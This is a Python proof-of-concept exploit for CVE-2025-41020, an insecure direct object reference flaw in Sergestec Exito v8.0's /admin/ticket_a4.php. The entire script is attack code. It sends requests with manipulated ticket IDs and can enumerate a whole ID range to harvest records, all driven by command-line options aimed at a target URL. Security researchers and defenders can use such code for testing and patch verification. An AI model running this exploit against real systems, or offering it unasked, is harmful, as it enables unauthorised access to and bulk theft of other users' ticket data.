#!/usr/bin/env python3
# CVE-2025-41020 - Sergestec Exito v8.0 IDOR Vulnerability PoC
# Exploit for Insecure Direct Object Reference in /admin/ticket_a4.php
import requests
import sys
import argparse
TARGET_URL = "http://target.com" # Replace with target URL
def exploit_idor(base_url, ticket_id):
"""
Exploit IDOR vulnerability by accessing ticket data via manipulated 'id' parameter.
"""
endpoint = f"{base_url}/admin/ticket_a4.php"
params = {"id": ticket_id}
try:
response = requests.get(endpoint, params=params, timeout=10)
if response.status_code == 200 and len(response.text) > 0:
print(f"[+] Ticket ID {ticket_id} - Status: {response.status_code}")
print(f"[+] Response length: {len(response.text)}")
return response.text
else:
print(f"[-] Ticket ID {ticket_id} - Status: {response.status_code}")
return None
except requests.exceptions.RequestException as e:
print(f"[!] Error: {e}")
return None
def enumerate_tickets(base_url, start_id=1, end_id=100):
"""
Enumerate ticket IDs to extract all accessible data.
"""
print(f"[*] Starting enumeration from ID {start_id} to {end_id}")
results = {}
for tid in range(start_id, end_id + 1):
data = exploit_idor(base_url, tid)
if data and len(data) > 100: # Filter out empty/error responses
results[tid] = data
print(f"[+] Found valid data for ticket ID: {tid}")
return results
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="CVE-2025-41020 PoC - Sergestec Exito IDOR")
parser.add_argument("-u", "--url", default=TARGET_URL, help="Target base URL")
parser.add_argument("-i", "--id", type=int, default=1, help="Specific ticket ID to access")
parser.add_argument("-r", "--range", action="store_true", help="Enumerate ticket ID range")
parser.add_argument("-s", "--start", type=int, default=1, help="Start ID for enumeration")
parser.add_argument("-e", "--end", type=int, default=100, help="End ID for enumeration")
args = parser.parse_args()
if args.range:
enumerate_tickets(args.url, args.start, args.end)
else:
exploit_idor(args.url, args.id)